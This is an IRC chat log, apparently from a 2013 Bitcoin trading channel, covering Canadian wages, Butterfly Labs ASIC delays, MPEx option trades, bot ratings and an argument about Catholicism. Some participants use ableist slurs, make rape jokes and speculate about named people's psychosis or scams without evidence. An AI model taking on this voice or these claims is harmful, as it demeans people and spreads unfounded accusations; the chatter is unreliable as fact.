third hand clothes Mar 21 03:53:35 wait behind restaurants for unfinished plates Mar 21 03:53:39 cuz you can't survive w/ 3rd hand clothes Mar 21 03:54:07 I think you mean Toronto, really. Not Ontario... Mar 21 03:54:28 you need a car in ontario and the running cost is high Mar 21 03:54:52 that would eat up 50% of your min wage salary Mar 21 03:55:00 https://bitcointalk.org/index.php?topic=150803.msg1650521#msg1650521 Mar 21 03:55:02 BFL update Mar 21 03:55:05 or sumtn Mar 21 03:55:06 in fuel, gas repairs Mar 21 03:55:10 hmm Mar 21 03:55:20 mircea_popescu: did you fix that url in 'strategic superiority' Mar 21 03:55:28 s/url/link/ Mar 21 03:55:44 tiberius... I don't know of anybody with a car costing them 600 per month... Mar 21 03:56:08 smickles ye Mar 21 03:56:18 lol at prototype, and lol anyone who is shocked at this, they claimed they never had anyhting working, and if their chip run was bad, ohhh lulz Mar 21 03:56:20 and you don't need a car, it is almost impossible on minimum wage. Mar 21 03:56:32 Although a bit cheaper than what you say. Mar 21 03:56:41 Unless you buy a new car every few years Mar 21 03:56:44 if you are poor i think you are better off being poor in US then canada Mar 21 03:56:58 because you can move to a warm state and at least have the climate Mar 21 03:57:04 by early to mid next week. Should be pretty smooth sailing after that." Mar 21 03:57:09 hahaha this is the 100th time Mar 21 03:57:22 150th. Mar 21 03:57:26 idk about Toronto because I've never seen the prices there. Mar 21 03:57:32 hey, this is how they get the th! Mar 21 03:57:37 tbh, you don't prototype an asic Mar 21 03:57:48 dub you just wish it real hard. Mar 21 03:58:38 you know what im saying Mar 21 03:59:12 But really, from what I know, you're not on 3rd hand clothes or living on fast food on minimum wage. You have plenty of good food, new clothes, decent appartment and eveything on a minimum wage. No car, no vacation. But you have enough money, can spare to make savings and have sufficient extra money to spoil yourself a bit. Mar 21 03:59:21 [BTCTC] [ASICMINER-PT] 1 @ 0.9289 BTC [-] Mar 21 03:59:30 Maybe not in Toronto Mar 21 03:59:58 namworld: you are so full of it im not going to continue, the government in canada classifies anyone under 22k a year as poverty Mar 21 04:00:03 [BTCTC] [ASICMINER-PT] 1 @ 0.929 BTC [+] Mar 21 04:00:07 But those price you mentions are not representative of what I'm accustomed to. Mar 21 04:00:11 the prices were high for everything there Mar 21 04:00:11 2k * 12 = 24 k tho Mar 21 04:00:36 namworld you must be living in the middle of nowhere, self sufficient Mar 21 04:00:53 public transport is none existant in ontario Mar 21 04:00:57 the trains are 50 years old Mar 21 04:00:57 I live in Montreal. Mar 21 04:01:10 well montreal is a little different Mar 21 04:01:14 and thats in quebec Mar 21 04:01:21 It's also Canada. Mar 21 04:01:27 quebec cost of living is 30-40% lower then ontario since half the population is poor Mar 21 04:01:37 and montreal is more european then american Mar 21 04:01:58 Your prices are for Toronto. And toronto jobs tend to pay much more than minimum wages. So are living costs. Mar 21 04:02:13 min wage in quebec is like $4 isnt it? Mar 21 04:02:16 https://bitcointalk.org/index.php?topic=150803.msg1650582#msg1650582 Mar 21 04:02:19 10$ Mar 21 04:02:31 I think it got raised recently, maybe more than that. Mar 21 04:03:01 !ticker Mar 21 04:03:02 Some are born to endless night. Mar 21 04:03:15 !estimate Mar 21 04:03:26 &ticker Mar 21 04:03:27 BTCUSD ticker | Best bid: 64.65552, Best ask: 64.74999, Bid-ask spread: 0.09447, Last trade: 64.74999, 24 hour volume: 92565.60276454, 24 hour low: 57.70200, 24 hour high: 66.00000, 24 hour vwap: 62.28030 Mar 21 04:03:29 ill estimate you! Mar 21 04:03:33 oh, $9.90, 10.15 starting may 1st Mar 21 04:04:17 You probably struggle on minimum wage in Toronto, but wages are higher there, just like rents. Mar 21 04:04:39 quebec has 20% youth unemployment rate thanks to the min wage Mar 21 04:04:40 Possibly the same in Vancouver. Mar 21 04:04:55 10 min wage in a poor place like QC lol only in canada Mar 21 04:06:52 QC ain't really poorer than the rest of Canada. Mar 21 04:07:11 montreal is probably my favorite city in canada Mar 21 04:07:31 We're talking about something like 1/8th less than Ontario I think. Mar 21 04:07:46 Per capita Mar 21 04:07:48 the roads are third world though in QC Mar 21 04:08:03 oh... yeah. Roads ain't nice Mar 21 04:08:43 [MPEX] [O.BTCUSD.P550T] 1000 @ 0.05710373 = 57.1037 BTC [-] Mar 21 04:08:44 [MPEX] [O.BTCUSD.P530T] 1000 @ 0.0512055 = 51.2055 BTC [-] Mar 21 04:08:45 [MPEX] [O.BTCUSD.P510T] 1000 @ 0.0512055 = 51.2055 BTC [-] Mar 21 04:08:46 [MPEX] [O.BTCUSD.P490T] 1000 @ 0.0512055 = 51.2055 BTC [-] Mar 21 04:08:48 [MPEX] [O.BTCUSD.P470T] 1000 @ 0.0512055 = 51.2055 BTC [-] Mar 21 04:11:01 I think we might just not have the same definition of minimum needed. Mar 21 04:11:18 woah, what is the table trader doing Mar 21 04:11:32 at face value, that looks like a hard short Mar 21 04:11:34 ;;ticker Mar 21 04:11:34 BTCUSD ticker | Best bid: 64.30000, Best ask: 64.40174, Bid-ask spread: 0.10174, Last trade: 64.40175, 24 hour volume: 92312.92023534, 24 hour low: 57.70200, 24 hour high: 66.00000, 24 hour vwap: 62.32727 Mar 21 04:11:45 or Toronto prices are really high... but wages there are among the highests in Canada. Mar 21 04:11:50 ;;calc 55/(1-.057) Mar 21 04:11:51 58.3244962884 Mar 21 04:11:58 ;;calc 55/(1.057) Mar 21 04:11:58 52.0340586566 Mar 21 04:12:12 ;;calc 47/(1.051) Mar 21 04:12:13 44.7193149382 Mar 21 04:12:41 i guess that was cutting losses from earlier ? Mar 21 04:12:42 ?? Mar 21 04:13:09 [MPEX] [O.BTCUSD.P550T] 1000 @ 0.05693195 = 56.932 BTC [-] Mar 21 04:13:11 [MPEX] [O.BTCUSD.P530T] 1000 @ 0.05359251 = 53.5925 BTC [+] Mar 21 04:13:12 [MPEX] [O.BTCUSD.P510T] 1000 @ 0.05359251 = 53.5925 BTC [+] Mar 21 04:13:16 [MPEX] [O.BTCUSD.P490T] 1000 @ 0.05359251 = 53.5925 BTC [+] Mar 21 04:13:18 smickles i think this is shorts being closed Mar 21 04:13:19 [MPEX] [O.BTCUSD.P470T] 1000 @ 0.05359251 = 53.5925 BTC [+] Mar 21 04:13:20 really would like to see a stronger bid wall Mar 21 04:13:38 ah, i see that on the chart now Mar 21 04:13:42 iirc these were sold at ~ .2-.3 Mar 21 04:13:59 i guess he's buying it back on the theory that he doesn't want to earn that last .05 at the risk of one full week Mar 21 04:14:00 certainly Mar 21 04:14:01 great short Mar 21 04:14:51 is the fourth friday not the 22nd? Mar 21 04:14:57 last friday of month Mar 21 04:15:04 ah, I thought I read fourth Mar 21 04:15:11 if you did link me Mar 21 04:15:41 http://mpex.co/?mpsic=O.BTCUSD.P050T Mar 21 04:15:45 All options expire on the last minute of the last Friday of their month (UTC times). Mar 21 04:15:46 like Mar 21 04:16:03 > goat: well yeah, you know, this almost sounds like a scam :/ [on BFL] <- lol your standards Mar 21 04:16:57 mircea_popescu: maybe I'm not interpreting this correctly, but from stat: "To which add sums deposited as surety for 4th Friday settled option and future contracts" Mar 21 04:17:23 futures are diff Mar 21 04:17:24 i guess that should read last friday huh Mar 21 04:17:36 :P Mar 21 04:17:45 thing is, to make the thing real crazy, futures (the fiat ones) used to be settled 4th friday Mar 21 04:17:55 I was wondering why the options mpexbot had up seemed high Mar 21 04:17:58 and the diff ones are settled imm dates Mar 21 04:18:31 futures are diff, love the pun Mar 21 04:18:33 :D Mar 21 04:18:36 lol Mar 21 04:19:15 $vwap ^oix Mar 21 04:19:17 smickles: 1 day: no data 7 day: average: 56.18724421 high: 57.56498348 low: 51.19715374 volume: 10790 btc: 1011.43642332 30 day: no data Mar 21 04:20:41 [MPEX] [O.BTCUSD.P550T] 1000 @ 0.05682571 = 56.8257 BTC [-] Mar 21 04:20:43 [MPEX] [O.BTCUSD.P530T] 1000 @ 0.05351801 = 53.518 BTC [-] Mar 21 04:20:44 [MPEX] [O.BTCUSD.P510T] 1000 @ 0.05351801 = 53.518 BTC [-] Mar 21 04:20:46 [MPEX] [O.BTCUSD.P490T] 1000 @ 0.05351801 = 53.518 BTC [-] Mar 21 04:20:53 [MPEX] [O.BTCUSD.P470T] 1000 @ 0.05351801 = 53.518 BTC [-] Mar 21 04:21:17 gentleman be ready ! i'm bullish but i smell a huge correction ! Mar 21 04:21:37 *hope Mar 21 04:21:55 could easily go back to 50 Mar 21 04:22:05 the bids are really thin Mar 21 04:22:10 yeah it's quite possible. Mar 21 04:22:19 ;;ticker Mar 21 04:22:20 BTCUSD ticker | Best bid: 64.10001, Best ask: 64.38999, Bid-ask spread: 0.28998, Last trade: 64.38999, 24 hour volume: 91573.17154420, 24 hour low: 57.70200, 24 hour high: 66.00000, 24 hour vwap: 62.35274 Mar 21 04:22:40 actually already moving back a little. Mar 21 04:23:56 "Given that Krugman is against bitcoin, the thing is certain to succeed." Mar 21 04:24:32 the mpex bot didn't price all of those options at 0.05351801, did it? how did they close at that level? (did the person trading have limit orders?) Mar 21 04:27:41 pizzaman1337 it did Mar 21 04:28:25 if you look at the book all puts under 50 or so sell for 0.05351801 Mar 21 04:28:37 yup Mar 21 04:28:42 why the same level? Mar 21 04:28:58 pizzaman1337 because it needs to protect the book. Mar 21 04:29:19 otherwise you could go 100k btc into mpoe bonds, then just buy cheap options and siphon interest away Mar 21 04:29:36 ah Mar 21 04:30:20 true. There's a minimum price for options. Mar 21 04:32:00 so vortex math Mar 21 04:32:03 thoughts Mar 21 04:32:13 hi,any chinese friend here? Mar 21 04:32:22 not unless rick comes by PAPASO Mar 21 04:32:36 这里有咱国人吗? Mar 21 04:32:47 i'm sorry, i don't speak chinese. Mar 21 04:32:50 what do you need tho ? Mar 21 04:32:56 mircea_popescu: lol, you hate the chiners? Mar 21 04:33:06 i do ? Mar 21 04:33:16 heh, it's just the way you answered Mar 21 04:33:17 yes, i want to trade option Mar 21 04:33:23 that's not too hard. Mar 21 04:33:27 do you have a mpex account ? Mar 21 04:33:33 BTC/USD options? MPEx Mar 21 04:33:47 it could be implied that noone here is friendly to the chinese other than rick. which isn't true ofc Mar 21 04:33:50 buy i dont know how to use this system Mar 21 04:34:04 there is a faq chinese version tho. Mar 21 04:34:10 http://mpex.co/faq_cn.html Mar 21 04:34:22 not sure how good it is, but should mostly work. Mar 21 04:34:27 [MPEX] [S.MPOE] 1146 @ 0.00072637 = 0.8324 BTC [-] Mar 21 04:34:28 you can also contact the guy for help. Mar 21 04:34:28 [MPEX] [S.MPOE] 133 @ 0.00072637 = 0.0966 BTC [-] Mar 21 04:34:37 [MPEX] [S.MPOE] 2400 @ 0.00071967 = 1.7272 BTC [-] Mar 21 04:34:39 [MPEX] [S.MPOE] 10000 @ 0.00071778 = 7.1778 BTC [-] Mar 21 04:34:41 [MPEX] [O.BTCUSD.P550T] 725 @ 0.05677964 = 41.1652 BTC [-] Mar 21 04:34:41 [MPEX] [O.BTCUSD.P530T] 725 @ 0.05225451 = 37.8845 BTC [-] Mar 21 04:34:46 [MPEX] [O.BTCUSD.P510T] 725 @ 0.05225451 = 37.8845 BTC [-] Mar 21 04:34:53 [MPEX] [O.BTCUSD.P490T] 725 @ 0.05225451 = 37.8845 BTC [-] Mar 21 04:34:55 [MPEX] [O.BTCUSD.P470T] 725 @ 0.05225451 = 37.8845 BTC [-] Mar 21 04:36:06 if I'm doing my math right, it seems that person made > ~$100k? crazy Mar 21 04:36:23 "There’s a reason supplying works a certain way. I order the goods, you deliver the goods within a couple of days and get paid within a couple of months. NOT the other way around. Never the other way around." mircea_popescu you must have a look at the kickstarter model Mar 21 04:36:45 smickles what do you mean ? Mar 21 04:36:57 you pay for and order the goods, then they company may or may not even make the product, if they do, you might not get it Mar 21 04:37:01 pizzaman1337 i think about 5k x 5 x .20 or so btc Mar 21 04:37:11 so prolly like 300k Mar 21 04:37:26 oh, I must have missed some previous orders Mar 21 04:37:29 smickles haha. that ain't a model Mar 21 04:37:29 that's pretty awesome Mar 21 04:37:35 pizzaman1337: the neat thing is they do it over and over Mar 21 04:37:49 I need more BTC, I want to play this game too... Mar 21 04:37:50 ya last month they lost like 5k i think Mar 21 04:38:05 It's a game with huge losses and huge gains... Mar 21 04:38:07 as in, shorted puts, price collapsed, covered same day Mar 21 04:38:20 yeah, that would hurt Mar 21 04:38:53 but yes, you can make a pretty penny if you have the capital Mar 21 04:38:57 and certainly huge roi Mar 21 04:39:09 course... if you're wrong... Mar 21 04:40:12 (19:24) < mircea_popescu> "Given that Krugman is against bitcoin, the thing is certain to succeed." << one of the best comments on that ZH article Mar 21 04:40:18 new high Mar 21 04:40:21 mod6 :p Mar 21 04:40:24 ;;ticker Mar 21 04:40:25 BTCUSD ticker | Best bid: 64.20000, Best ask: 64.41999, Bid-ask spread: 0.21999, Last trade: 64.41999, 24 hour volume: 91269.99747505, 24 hour low: 57.70200, 24 hour high: 66.00000, 24 hour vwap: 62.38443 Mar 21 04:40:34 oh nvm Mar 21 04:40:36 notrly. Mar 21 04:40:43 i forgot we hit 66 when i was sleeping Mar 21 04:40:51 well, i thought it was funny anyway. Mar 21 04:41:14 we spiked up to 65.3 and i got all tingely for nothing Mar 21 04:41:23 so is Luke-Jr going back to bfl by early to mid next week ? Mar 21 04:41:36 lol he has to go back now? Mar 21 04:41:44 well... Mar 21 04:41:55 why did he even go again? Mar 21 04:41:59 they're making an entirely new pcb no ? Mar 21 04:42:11 i guess i dont understand what he is doing there Mar 21 04:42:22 Chaang-Noi basically, he's trying to prop bfl. Mar 21 04:42:36 prop? Mar 21 04:42:38 course it's much like inaba trying to prop bfl, you don't prop flagging scams with retarded trolls. Mar 21 04:42:55 to prop, you know, stick a bit of wood in the way of a collapsing wall Mar 21 04:43:01 yeah, i dont think that is going to work cuz they keep going home with nothiong Mar 21 04:43:13 is BFL processing refunds? Mar 21 04:43:26 in fiat if at all Mar 21 04:43:27 tiberiusiv so far they claim to. Mar 21 04:43:39 but basically people get a 95% haircut if they refund, so... Mar 21 04:43:49 i think there is a rule that you have to wait 3 months after ordering or something Mar 21 04:43:59 but i have not seen many people bitching Mar 21 04:44:01 no, they pretty much get to walk away with whatever they scammed off the idiots thinking they're the btc "community" Mar 21 04:44:26 but the BTcs were instantly sold by bitpay Mar 21 04:44:30 your girl thinks bitcoin community = WoT Mar 21 04:44:49 Chaang-Noi btc finance certainly is. Mar 21 04:44:56 lol Mar 21 04:44:58 basic refunds were like 80% haircuts Mar 21 04:45:03 tiberiusiv pretty much. Mar 21 04:45:16 BFL would be massively insolvent if they had to issue full BTC refunds Mar 21 04:45:31 so then let's make a new deal : you can't refund btc, you can't take btc. Mar 21 04:45:36 friedcat has a W0T account? lulz Mar 21 04:45:38 sell in fiat. Mar 21 04:45:43 i agree mircea Mar 21 04:45:50 Chaang-Noi you think he's in finance ? Mar 21 04:45:53 ;;getrating friedcat Mar 21 04:45:53 This user has not yet been rated. WARNING: Currently not authenticated. Mar 21 04:46:04 ;;ident friedcat Mar 21 04:46:04 well they used BTC as a medium of exchange Mar 21 04:46:04 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Mar 21 04:46:21 ;;gpg info friedcat Mar 21 04:46:21 No such user registered. Mar 21 04:46:22 tiberiusiv still a horrible deal. Mar 21 04:46:26 selling stock to get money to build a company, if that is not finance i dont know what it is Mar 21 04:46:29 agreed Mar 21 04:46:34 it's actually worse than the usual glbse / usagi crap. Mar 21 04:46:46 Chaang-Noi it isn't. that's founding. Mar 21 04:46:51 what ended up being the reason for glbse closing Mar 21 04:46:55 he did it without advisory and he fucked it up pretty good. Mar 21 04:47:00 selling stock not finacne, okay Mar 21 04:47:10 advisory? Mar 21 04:47:26 you know how companies floating themselves retain the services of banks ? Mar 21 04:47:36 this is because companies are not in finance, they are in whatever the fuck their ops are. Mar 21 04:47:42 retail or services or making oil rigsd Mar 21 04:47:48 mp try this... http://en.wikipedia.org/wiki/Finance Mar 21 04:48:15 friedcat did his own finance clearly, he did not hire a bank... Mar 21 04:48:24 he can do morethan 1 thing at 1 time... Mar 21 04:48:26 Chaang-Noi how about you try http://trilema.com/2013/wikipedia-the-special-olympics-for-the-mentally-retarded/ instead. Mar 21 04:48:58 lose an argument, have nothing left but insults, classy :/ Mar 21 04:49:11 at least i admit when i fuck up Mar 21 04:49:16 you come quoting wikipedia in this discussion insults are too good a fate. Mar 21 04:49:19 lol, that pic "wall street, the center of american finance" with what looks like a highwayman and a security camera looking the other way Mar 21 04:49:57 anyway, tiberiusiv : nobody really knows. my theory is the head chav got a bad dose, went psychotic, thought da polis is after him, deleted everythign Mar 21 04:50:08 probably flushed some usb sticks down the toilet too Mar 21 04:50:11 in the heat of the moment. Mar 21 04:50:16 lol Mar 21 04:50:24 haha smickles! Mar 21 04:51:00 of course simple idiopathic schizophrenia always works as an explanation too. it doesn't have to be drugs. Mar 21 04:51:08 [MPEX] [S.MPOE] 5700 @ 0.00070854 = 4.0387 BTC [-] Mar 21 04:51:08 [MPEX] [S.MPOE] 6079 @ 0.00069894 = 4.2489 BTC [-] Mar 21 04:51:14 [BTCTC] [ASICMINER-PT] 2 @ 0.929 = 1.858 BTC [+] Mar 21 04:51:27 typical onset is early adulthood, no? Mar 21 04:51:31 yes. Mar 21 04:51:33 ;;getrating usagi Mar 21 04:51:34 WARNING: Currently not authenticated. User Usagi, rated since Mon Jun 18 09:33:55 2012. Cumulative rating 40, from 31 total ratings. Received ratings: 27 positive, 4 negative. Sent ratings: 41 positive, 4 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Usagi Mar 21 04:51:42 well... 30s, 40s or 50s. the later the milder. Mar 21 04:51:47 ohh finance! i get it now Mar 21 04:51:59 but usually there;'s episodes first, before full blown tableau. Mar 21 04:52:04 [BTCTC] [ASICMINER-PT] 5 @ 0.93 = 4.65 BTC [+] Mar 21 04:52:11 Chaang-Noi haha yes. usagi is in finance. Mar 21 04:52:16 he just sucks at it massively. Mar 21 04:52:40 ;;getrating pirateat40 Mar 21 04:52:40 WARNING: Currently not authenticated. User pirateat40, rated since Mon Aug 1 14:18:45 2011. Cumulative rating -125, from 89 total ratings. Received ratings: 55 positive, 34 negative. Sent ratings: 65 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=pirateat40 Mar 21 04:53:03 ;;getrating foodstamps Mar 21 04:53:03 ;;getrating f00d5t4mp Mar 21 04:53:04 This user has not yet been rated. WARNING: Currently not authenticated. Mar 21 04:53:05 This user has not yet been rated. WARNING: Currently not authenticated. Mar 21 04:53:06 ;;getrating foodstamp Mar 21 04:53:06 This user has not yet been rated. WARNING: Currently not authenticated. Mar 21 04:53:13 bah, how to spell Mar 21 04:53:18 Chaang-Noi a better traversal tool would be ;;gettrust mircea_popescu X Mar 21 04:53:23 ;;getrating ThickAsThieves Mar 21 04:53:23 oh he did some wierd ass numbers or something Mar 21 04:53:23 WARNING: Currently not authenticated. User thickasthieves, rated since Sat Mar 2 08:19:18 2013. Cumulative rating 2, from 2 total ratings. Received ratings: 2 positive, 0 negative. Sent ratings: 3 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=thickasthieves Mar 21 04:53:51 ;;getrating burnside Mar 21 04:53:52 This user has not yet been rated. WARNING: Currently not authenticated. Mar 21 04:53:57 ;;getrating nefario Mar 21 04:53:57 WARNING: Currently not authenticated. User nefario, rated since Tue Jul 12 19:55:49 2011. Cumulative rating -34, from 16 total ratings. Received ratings: 6 positive, 10 negative. Sent ratings: 2 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=nefario Mar 21 04:54:27 lol, PayPal has the worst cumulative rating Mar 21 04:54:33 ;;getrating PayPal Mar 21 04:54:33 WARNING: Currently not authenticated. User PayPal, rated since Sat Aug 25 16:56:10 2012. Cumulative rating -181, from 29 total ratings. Received ratings: 4 positive, 25 negative. Sent ratings: 0 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=PayPal Mar 21 04:54:37 lol Mar 21 04:54:44 how is dwolla doing ? Mar 21 04:54:53 ;;getrating dwolla Mar 21 04:54:53 This user has not yet been rated. WARNING: Currently not authenticated. Mar 21 04:54:57 ;;getrating litecoin Mar 21 04:54:58 This user has not yet been rated. WARNING: Currently not authenticated. Mar 21 04:55:05 outofthe meme Mar 21 04:55:09 ;;getrating goat Mar 21 04:55:10 This user has not yet been rated. WARNING: Currently not authenticated. Mar 21 04:55:20 ;;rate urmom 1 cheap fast service would cum again+++ Mar 21 04:55:21 Error: For identification purposes, you must be authenticated to use the rating system. Mar 21 04:55:26 im not in finace, never have been:) Mar 21 04:55:44 mircea_popescu: I haven't left yet. Mar 21 04:56:10 do you know when you will go Luke-Jr? Mar 21 04:56:11 Luke-Jr a, must have missed that announcement. Mar 21 04:56:29 Luke, you mean go again right? Mar 21 04:56:46 i thought you reported about the new building design? Mar 21 04:57:37 ;;getrating spain Mar 21 04:57:37 This user has not yet been rated. WARNING: Currently not authenticated. Mar 21 04:57:42 ;;getrating ireland Mar 21 04:57:42 This user has not yet been rated. WARNING: Currently not authenticated. Mar 21 04:57:47 ;;getrating cyprus Mar 21 04:57:48 This user has not yet been rated. WARNING: Currently not authenticated. Mar 21 04:57:59 ;;getrating scottlad Mar 21 04:58:00 WARNING: Currently not authenticated. User scottlad, rated since Fri May 6 09:10:02 2011. Cumulative rating -66, from 16 total ratings. Received ratings: 5 positive, 11 negative. Sent ratings: 4 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=scottlad Mar 21 04:58:01 Chaang-Noi: I'll be back at their labs tomorrow morning.. Mar 21 04:58:09 cool Mar 21 04:58:20 i guess that means they must think they are progressing Mar 21 04:58:21 and back home Friday evening, unless they ask me to stay and my wife gives the okay Mar 21 04:58:28 Luke-Jr wait. you went or didn't go ? are you there now ? this is getting more and more self-contradictory. Mar 21 04:58:40 but srsly, so bored here I'm not sure about staying much longer XD Mar 21 04:58:49 you in kc? Mar 21 04:58:53 mircea_popescu: I arrived here last Thursday, and am still here now. Mar 21 04:58:58 ow. Mar 21 04:59:01 what ?! Mar 21 04:59:03 my family lives in kc Mar 21 04:59:05 you've been there A WEEK ?! Mar 21 04:59:08 yes Mar 21 04:59:16 im from kcnot a whole lot to do Mar 21 04:59:20 i'll brb, my jaw is somewhere Mar 21 04:59:25 I lived in KC like 6 years ago Mar 21 04:59:32 only good place i know are places odds are you wont like Mar 21 04:59:46 i lived there like 12 years ago Mar 21 04:59:54 wow, i love kc Mar 21 04:59:55 good bbq Mar 21 05:00:02 bad asics Mar 21 05:00:04 the museums, pool halls Mar 21 05:00:21 i dunno doods, if i went for a week's vacation it'd prolly not be kentucky. Mar 21 05:00:23 disk golf Mar 21 05:00:26 even if fried chicken. Mar 21 05:00:43 all I have walking distance is a Sonic's Mar 21 05:00:44 they mean kansas city Mar 21 05:00:45 fishing Mar 21 05:01:05 either way though lol Mar 21 05:01:05 mod6 right, cause there's a difference >< Mar 21 05:01:06 <[\\\]> at least i admit when i fuck up << BULLSHIT Mar 21 05:01:14 the footbal team sucks, but it's fun b/c the crowd really gets into it Mar 21 05:01:15 lol Mar 21 05:01:19 i never said go to kc, but if you have to be there eat bbq Mar 21 05:01:36 yeah go chiefs, but last season... omg Mar 21 05:01:39 dunno, KC was okay except for the complete lack of Catholic churches Mar 21 05:01:48 LOL Mar 21 05:01:49 missouri has no churches ?! Mar 21 05:02:01 missouri is southern baptist territory Mar 21 05:02:03 dudes how much have i been drinking tonight ? Mar 21 05:02:04 isn't there a cathedral Mar 21 05:02:08 KC doesn't Mar 21 05:02:11 Luke-Jr there used to be some, but the southern babtists took them over Mar 21 05:02:15 <[\\\]> Luke-Jr, they've probably got Catholic churches, just not the kind you approve of. Mar 21 05:02:21 lol Mar 21 05:02:22 my parents go to what used to be a catholic church Mar 21 05:02:23 [\\\] uncatholic Mar 21 05:02:24 luke approves of nothing Mar 21 05:02:30 he doesnt even recognize the new pope Mar 21 05:02:32 you could drive to topeka and go to WBC Mar 21 05:02:32 <[\\\]> Diablo-D3: he approves of >25 BTC Mar 21 05:02:41 <[\\\]> Diablo-D3, he didn't recognize the last 4 Mar 21 05:02:54 what was wrong with jp2 ? Mar 21 05:02:56 Im not catholic, but I didnt mind john paul II Mar 21 05:03:00 mod6: Topeka is actually the nearest Catholic mission, and had Mass last Sunday that I couldn't get a ride to Mar 21 05:03:06 also, http://mobile.bloomberg.com/news/2013-03-20/fleeing-the-euro-for-bitcoins-.html Mar 21 05:03:06 at least he tried to tackle the pedophile problem Mar 21 05:03:07 also, kcmo isn't as good a kck Mar 21 05:03:08 no one else did Mar 21 05:03:11 mircea_popescu: he wasn't a Catholic Mar 21 05:03:16 <[\\\]> lol Mar 21 05:03:18 <[\\\]> here we go again Mar 21 05:03:22 the pope was insufficiently catholic ? Mar 21 05:03:29 mircea_popescu: he wasn't a pope either Mar 21 05:03:29 hell, there was a second attempt on his life, one in the vatican will admit to Mar 21 05:03:30 topeka is pretty far away Mar 21 05:03:32 that's why he retired Mar 21 05:03:42 Chaang-Noi: hence why I moved out of KC Mar 21 05:03:47 <[\\\]> mircea_popescu: Luke-Jr's view of Catholicism doesn't match the 2Billion other Catholics' Mar 21 05:03:49 smickles no, jp2 was before ratz Mar 21 05:03:50 the ring of pedophiles that control the vatican tried to kill him because he was trying to get rid of them Mar 21 05:03:51 where to? Mar 21 05:03:59 [\\\]: it matches the 50 billion others ;P Mar 21 05:04:05 [\\\]: I dont blame him honestly Mar 21 05:04:06 Chaang-Noi: Omaha, worst decision of my life Mar 21 05:04:13 lol Mar 21 05:04:19 oh man Mar 21 05:04:20 modern catholocism (ie, everything from 200AD on) is built on lies and fraud Mar 21 05:04:25 i was almost born in omaha Mar 21 05:04:30 <[\\\]> Diablo-D3: Luke-Jr disagrees Mar 21 05:04:39 they moved to columbus, ne before it happened tho Mar 21 05:04:39 <[\\\]> he only bailed on the last 50 years. Mar 21 05:04:43 I dont care if he disagrees, the historical record blatantly says this Mar 21 05:04:44 Luke i thought you were going to say boston or something Mar 21 05:04:48 [BTCTC] [PAJKA.BOND] 5 @ 0.100001 = 0.5 BTC [-] Mar 21 05:04:50 [BTCTC] [PAJKA.BOND] 3 @ 0.1 = 0.3 BTC [-] Mar 21 05:04:52 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [-] Mar 21 05:04:55 you cant disagree with fact Mar 21 05:05:01 reality doesnt work that way Mar 21 05:05:09 just ignore Diablo-D3's trolling, I am Mar 21 05:05:15 [BTCTC] [ASICMINER-PT] 1 @ 0.93 BTC [+] Mar 21 05:05:29 lol, am I trolling if I say popes led armies into the middle east to murder innocent people? Mar 21 05:05:30 <[\\\]> Luke-Jr: Diablo-D3 doesn't troll. Mar 21 05:05:31 .93, go asicminer! :) Mar 21 05:05:39 [\\\]: rarely Mar 21 05:06:02 Diablo-D3: yes Mar 21 05:06:24 So, I am trolling Luke-Jr with cold hard facts. Mar 21 05:06:24 Go me. Mar 21 05:06:33 lies* Mar 21 05:07:04 So you're saying the holy crusades never happened? Mar 21 05:07:32 no, I'm saying they were led by civil authorities and killed GUILTY people. that's why they're holy Mar 21 05:08:05 the arabs were spamming the network. Mar 21 05:08:13 lol Mar 21 05:08:15 for the most part, the Crusades were a defensive retaliation Mar 21 05:08:30 "defensive retaliation" Mar 21 05:08:36 i like the sound of that Mar 21 05:08:38 yes, they were defensive against women and children who were guilty for the crime of being alive. yup. Mar 21 05:08:39 yes lead by civil but lol at killing guility people:) Mar 21 05:08:52 smickles like say there's this hot chick in a short skirt and she's wearing no knickers right ? Mar 21 05:09:00 you get her against a wall and give her a good seeing-to Mar 21 05:09:12 "defensive retaliation" Mar 21 05:09:31 say no more ;) ;) Mar 21 05:09:43 so someone breaks into your house and throws you out. then you go buy a gun and chase him back out. that's what the Crusades were (the 2nd part) Mar 21 05:09:47 a wink is as good as a whistle to a blind bat. Mar 21 05:09:48 oh dont get me wrong, they raped the women and children too Mar 21 05:09:56 and goats Mar 21 05:10:00 dont forget goat rape Mar 21 05:10:00 Luke-Jr: except Jesus said to live side by side in peace. Mar 21 05:10:02 and donkeys Mar 21 05:10:07 Luke-Jr say, if they were holy how come they lost ? the arabs kinda owned them holy ppl... Mar 21 05:10:09 mircea_popescu: you crack me up Mar 21 05:10:44 they won the crusades in spain if that counts Mar 21 05:11:09 ya except la reconquista was perhaps the bloodiest, messiest most agressive act of racism in european history Mar 21 05:11:18 excluding of course all the french medieval history Mar 21 05:11:20 and the german Mar 21 05:11:22 and english Mar 21 05:11:25 you get the idea. Mar 21 05:11:27 mircea_popescu: thats a pretty hard thing to claim, really Mar 21 05:11:28 o and caesar. Mar 21 05:11:30 what about the popes who just wanted the power and held orgies, killed people for the fun of it and such? Mar 21 05:11:38 I mean, what about the whole slavery thing in america? Mar 21 05:11:41 smickles not real catholics. Mar 21 05:11:46 thats pretty high up on the list Mar 21 05:11:57 I understand luke's point when he says not real catholics Mar 21 05:12:03 anyone who believes in God wouldn't have done that Mar 21 05:12:07 problem is… they still did it. Mar 21 05:12:15 smickles: what about them? Mar 21 05:12:15 Diablo-D3 also known as the not true catholic phallacy. Mar 21 05:12:16 and the catholic church is still to blame for it Mar 21 05:12:19 ;;getrating jesus Mar 21 05:12:20 This user has not yet been rated. WARNING: Currently not authenticated. Mar 21 05:12:30 mircea_popescu: yup Mar 21 05:12:33 ok im authin for that one Mar 21 05:12:38 ;;eauth mircea_popescu Mar 21 05:12:39 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Mar 21 05:12:44 Luke-Jr: it's an entertaining read, isn't it? (the history of the popes) Mar 21 05:12:55 mircea_popescu: this is why I just moot the entire issue and 